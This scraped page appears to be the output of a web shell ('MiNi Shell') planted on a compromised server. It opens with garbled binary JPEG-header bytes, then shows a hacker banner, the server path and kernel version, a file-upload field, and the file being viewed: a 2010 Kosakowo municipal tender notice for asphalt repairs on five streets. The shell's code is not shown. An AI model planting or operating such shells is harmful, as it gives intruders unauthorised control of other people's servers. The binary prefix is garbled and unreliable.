JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100916/295408-N-2010.html

<p class="kh_header"><b>Kosakowo: REMONTY ISTNIEJĄCYCH NAWIERZCHNI W CIĄGU DRÓG GMINNYCH nr 3</b><br>
<b>Numer ogłoszenia: 295408 - 2010; data zamieszczenia: 16.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Gminy , ul. Żeromskiego 69, 81-198 Kosakowo, woj. pomorskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kosakowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONTY ISTNIEJĄCYCH NAWIERZCHNI W CIĄGU DRÓG GMINNYCH nr 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem są roboty drogowe terenie gminy Kosakowo w branży drogowej polegające na położeniu powierzchni asfaltowej na podbudowie z kruszywa łamanego, bez okrawężnikowania  z regulacja pionową włazów kanałowych kratek ściekowych 

Szczegółowy opis przedmiotu zamówienia z podziałem na zadania przedstawiono w FORMULARZU C stanowiącym załącznik do niniejszej siwz.
Zadanie 1
OPIS PRZEDMIOTU ZAMÓWIENIA
1. Remont istniejącej nawierzchni w ciągu ul. Kujawskiej
w miejscowości Rewa
nie naruszający istniejącego pasa drogowego i w granicach istniejącej
korony drogi
Przedmiotem zamówienia są roboty budowlane w branży drogowej polegające na
położeniu nawierzchni asfaltowej na podbudowie z kruszywa łamanego, szerokości 5,0m,
długości 191,0m wraz z poszerzeniami, krawężnikiem i regulacją pionową studzienek i zasuw
ulicznych.
Zakres robót obejmuje wykonanie:
1. Rozebrania nawierzchni z płyt wielootworowych o pow. do 1 m2
na powierzchni 89,15m2
2. Koryta - na długości 191,0m, szerokości 5,0m, głębokości 0,2m wraz z poszerzeniem
3. Mechaniczne profilowanie i zagęszczenia podłoża pod warstwy konstrukcyjne 971m2
4. Warstwy dolnej podbudowy z kruszywa łamanego o gr. 20cm po zagęszczeniu 971m2
5. Skropienia poszczególnych warstw asfaltem - 875,5m2
6. Nawierzchni warstwa ścieralna z mieszanek mineralno - bitumicznych grysowo -
żwirowych o grubości 5cm po zagęszczeniu - 875,5m2
7. Regulacji pionowej studzienek, zasuw ulicznych - 4szt
8. Krawężnika betonowego 12x25 cm wtopionego na podsypce
cementowo - piaskowej - 19,0m
9. Plantowanie i uporządkowanie poboczy - 382,0m2
Zadanie 2
OPIS PRZEDMIOTU ZAMÓWIENIA
2. Remont istniejącej nawierzchni w ciągu ul. Chabrowej
w miejscowości Kosakowo
nie naruszający istniejącego pasa drogowego i w granicach istniejącej
korony drogi
Przedmiotem zamówienia są roboty budowlane w branży drogowej polegające na
położeniu nawierzchni asfaltowej na podbudowie z kruszywa łamanego, szerokości 5,50m,
długości 130,0m wraz z poszerzeniami, krawężnikiem i regulacją pionową studzienek i zasuw
ulicznych.
Zakres robót obejmuje wykonanie:
1. Koryta - na długości 130,0m, szerokości 5,50m, głębokości 0,2m wraz z
poszerzeniem
2. Mechaniczne profilowanie i zagęszczenia podłoża pod warstwy
konstrukcyjne 790,50m2
3. Warstwy dolnej podbudowy z kruszywa łamanego o gr. 20cm
po zagęszczeniu 790,50m2
4. Skropienia poszczególnych warstw asfaltem - 736,5,5m2
5. Nawierzchni warstwa ścieralna z mieszanek mineralno - bitumicznych grysowo -
żwirowych o grubości 5cm po zagęszczeniu -736,5,5m2
6. Regulacji pionowej studzienek, zasuw ulicznych - 5szt
7. Krawężnika betonowego 12x25 cm wtopionego na podsypce
cementowo - piaskowej - 5,0m
8. Plantowanie i uporządkowanie poboczy - 119,0m2
Zadanie 3
OPIS PRZEDMIOTU ZAMÓWIENIA
3. Remont istniejącej nawierzchni w ciągu ul. Goździkowej
w miejscowości Kosakowo
nie naruszający istniejącego pasa drogowego i w granicach istniejącej
korony drogi
Przedmiotem zamówienia są roboty budowlane w branży drogowej polegające na
położeniu nawierzchni asfaltowej na podbudowie z kruszywa łamanego, szerokości 5,0m,
długości ca 206,0m plus poszerzenia i wykonanie studni chłonnej wraz z wpustem ulicznym i
przykanalikiem.
Zakres robót obejmuje wykonanie:
1. Koryta - na długości 206,0m, szerokości 5,0m, głębokości 0,2m plus poszerzenie
2. Mechaniczne profilowanie i zagęszczenia podłoża pod warstwy konstrukcyjne
1046,0m2
3. Warstwy dolnej podbudowy z kruszywa łamanego o gr. 15cm po zagęszczeniu
1046,0m2
4. Skropienia nawierzchni drogowej asfaltem - 943,0m2
5. Nawierzchni warstwa ścieralna z mieszanek mineralno - bitumicznych grysowo -
żwirowych o grubości 5cm po zagęszczeniu - 943,0m2
6. Rowki pod krawężniki i ławy 30x40 - 20m
7. Ława pod krawężnik betonowy z oporem - 1,3m3
8. Krawężniki betonowe wystające 15x30 - 20m
9. Regulacji pionowej studzienek, zasuw ulicznych - 15szt
10. Studnia chłonna 4,5 mb, średnicy 1200mm kompletna - 1szt
11. Studzienka ściekowa z gotowych elementów bet. o śr. 500mm z osadnikiem bez
syfonu wraz z przykanalikiem PVC średnicy 200mm dł.5,0mb- 1szt
12. Plantowanie i uporządkowanie poboczy - 412,0m2
Zadanie 4
OPIS PRZEDMIOTU ZAMÓWIENIA
4. Remont istniejącej nawierzchni w ciągu ul. Przybosia
w miejscowości Suchy Dwór
nie naruszający istniejącego pasa drogowego i w granicach istniejącej
korony drogi
Przedmiotem zamówienia są roboty budowlane w branży drogowej polegające na
położeniu nawierzchni asfaltowej na podbudowie z kruszywa łamanego, szerokości 5,0m,
długości 216,0m plus poszerzenia i wykonanie studni chłonnej wraz z wpustem ulicznym i
przykanalikiem.
Zakres robót obejmuje wykonanie:
1. Koryta - na długości 216,0m, szerokości 5,0m, głębokości 0,2m plus poszerzenie
2. Mechaniczne profilowanie i zagęszczenia podłoża pod warstwy konstrukcyjne
1160,0m2
3. Warstwy dolnej podbudowy z kruszywa łamanego o gr. 15cm po zagęszczeniu
1160,0m2
4. Skropienia nawierzchni drogowej asfaltem - 1052,0m2
5. Nawierzchni warstwa ścieralna z mieszanek mineralno - bitumicznych grysowo -
żwirowych o grubości 5cm po zagęszczeniu - 1052,0m2
6. Rowki pod krawężniki i ławy 30x40 - 20m
7. Ława pod krawężnik betonowy z oporem - 1,3m3
8. Krawężniki betonowe wystające 15x30 - 20m
9. Regulacji pionowej studzienek, zasuw ulicznych - 8szt
10. Studnia chłonna 4,5 mb, średnicy 1200mm kompletna - 1szt
11. Studzienka ściekowa z gotowych elementów bet. o śr. 500mm z osadnikiem bez
syfonu wraz z przykanalikiem PVC średnicy 200mm dł.5,0mb- 1szt
12. Krawężniki betonowe wtopione o wymiarach 12x25 na pods. cem. - piask. - 13,5,0m
13. Plantowanie i uporządkowanie poboczy - 432,0m2
Zadanie 5
OPIS PRZEDMIOTU ZAMÓWIENIA
5. Remont istniejącej nawierzchni w ciągu ul. Herberta
w miejscowości Pogórze
nie naruszający istniejącego pasa drogowego i w granicach istniejącej
korony drogi
Przedmiotem zamówienia są roboty budowlane w branży drogowej polegające na
położeniu nawierzchni asfaltowej na podbudowie z kruszywa łamanego, szerokości 5,0m,
długości 315,0m plus poszerzenia, z krawężnikiem i regulacją pionową studzienek i zasuw
ulicznych.
Zakres robót obejmuje wykonanie:
1. Koryta - na długości 315,0m, szerokości 5,0m, głębokości 0,2m plus poszerzenie
2. Mechaniczne profilowanie i zagęszczenia podłoża pod warstwy konstrukcyjne
1584,0m2
3. Warstwy dolnej podbudowy z kruszywa łamanego o gr. 20cm
po zagęszczeniu 1584,0,0m2
4. Skropienia nawierzchni drogowej asfaltem - 1426,5,0m2
5. Nawierzchni warstwa ścieralna z mieszanek mineralno - bitumicznych grysowo -
żwirowych o grubości 5cm po zagęszczeniu - 1426,5,0m2
6. Regulacji pionowej studzienek, zasuw ulicznych - 20szt
7. Krawężniki betonowe wtopione o wymiarach 12x25 na pods. cem. - piask. - 24,5m
8. Plantowanie i uporządkowanie poboczy - 630,0m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego do zamówienia podstawowego, zgodnie z art. 67. ust.1 pkt.6 ustawy w zakresie obejmującym przedmiot zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Ustalona wartość wadium wynosi 1.000 zł  (JEDEN  TYSIĄC ZŁOTYCH) dla oferty złożonej dla jednego zadania. 
Oferta złożona na większą ilość zadań musi być zabezpieczona wielokrotnością tysiąca złotych w zależności od ilości zadań, na które została złożona, np. oferta złożona na wszystkie zadania musi być zabezpieczona wadium w wysokości 5 x1.000 zł = 5.000 zł (PIĘĆ TYSIĘCY ZŁOTYCH)
2 Każdy Wykonawca zobowiązany jest do wniesienia wadium w terminie składania ofert. Dowód wniesienia wadium należy dołączyć do składanej oferty.
3. Wadium może być wniesione w: pieniądzu, poręczeniach bankowych, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824). Miejscem przyjmowania wadium w postaci bezgotówkowej jest Biuro Obsługi Interesanta w siedzibie Zamawiającego. 
4. Wadia w postaci gotówkowej należy wpłacać konto bankowe BS Rumia nr 65 8351 0003 0000 1267 2000 0040.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunków udziału w tym postępowaniu, jeżeli: Wykonawca wykaże się co najmniej doświadczeniem, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegającym na wykonaniu przynajmniej dwóch robót budowlanych o wartości nie mniejszej niż 70.000,00 zł brutto każda polegających na budowie dróg publicznych o nawierzchni z asfaltobetonu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunków udziału w tym postępowaniu, jeżeli: 
Wykonawca będzie dysponował Kierownikiem Robót z minimum 5-cio letnim doświadczeniem w branży, wykształceniem wyższym, uprawnionego do kierowania robotami budowlanymi w specjalności drogownictwo</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej z uwzględnieniem podanych warunków jej wprowadzenia. 
1) Zmiana terminu zakończenia robót, 
a) zmiany spowodowane warunkami atmosferycznymi, w szczególności: 
- klęski żywiołowe, 
- warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonanie odbiorów; 
b) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: 
- niewypały i niewybuchy, 
- wykopaliska archeologiczne, 
- odmienne od przyjętych w dokumentacji projektowej warunki geologiczne, 
c) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności: 
- wstrzymanie robót przez Zamawiającego, 
- konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót; 
d) zmiany będące następstwem działania innych organów, np. eksploatatorów infrastruktury, właścicieli gruntów pod inwestycję, organy administracji poprzez przekroczenie terminów wydania niezbędnych do prowadzenia inwestycji: decyzji, zezwoleń, uzgodnień, odmowa wydania tychże decyzji, zezwoleń i uzgodnień, która nie nastąpiła z winy Wykonawcy, odmowa udostępnienia gruntu przez właścicieli nieruchomości; 
e) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, wskutek których niemożliwe będzie ukończenie zamówienia w terminie umownym, 
f) dopuszcza się skrócenie terminu realizacji przedmiotu umowy, w przypadku wcześniejszego zakończenia prac. 
2) Zmiana sposobu realizacji przedmiotu zamówienia spowodowanych w szczególności następującymi okolicznościami: 
a) niedostępność na rynku materiałów lub urządzeń, wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń; 
b) pojawienie się na rynku materiałów lub urządzeń nowszej generacji, pozwalających na zaoszczędzenia kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót; 
c) pojawienie się nowszej technologii wykonania zaprojektowanych robót, pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy; 
d) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych, niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonanie przedmiotu umowy. 
3) Inne zmiany spowodowane następującymi okolicznościami: 
a) zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne spełniające warunki określone w SIWZ. Zmiana ta nie wymaga aneksu do umowy (zmiana jest możliwa na osoby spełniające wymogi SIWZ, a dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę); 
b) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ; 
c) zmiana obowiązującej stawki VAT; 
d) zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy, na skutek zmiany zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu. 
4) Wszystkie powyższe zmiany stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią one jednak zobowiązania do wyrażenia takiej zgody. 
5) Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo Zamówień Publicznych: 
a) zmiana danych teleadresowych, 
b) zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr rachunku bankowego).
8. Płatnikiem jest: Urząd Gminy, 81 - 198 Kosakowo ul. Żeromskiego 69, NIP 587-15-69- 970.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kosakowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kosakowo
ul. Żeromskiego 69
81-198 Kosakowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2010 godzina 10:00, miejsce: Urząd Gminy Kosakowo
ul. Żeromskiego 69
81-198 Kosakowo
Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com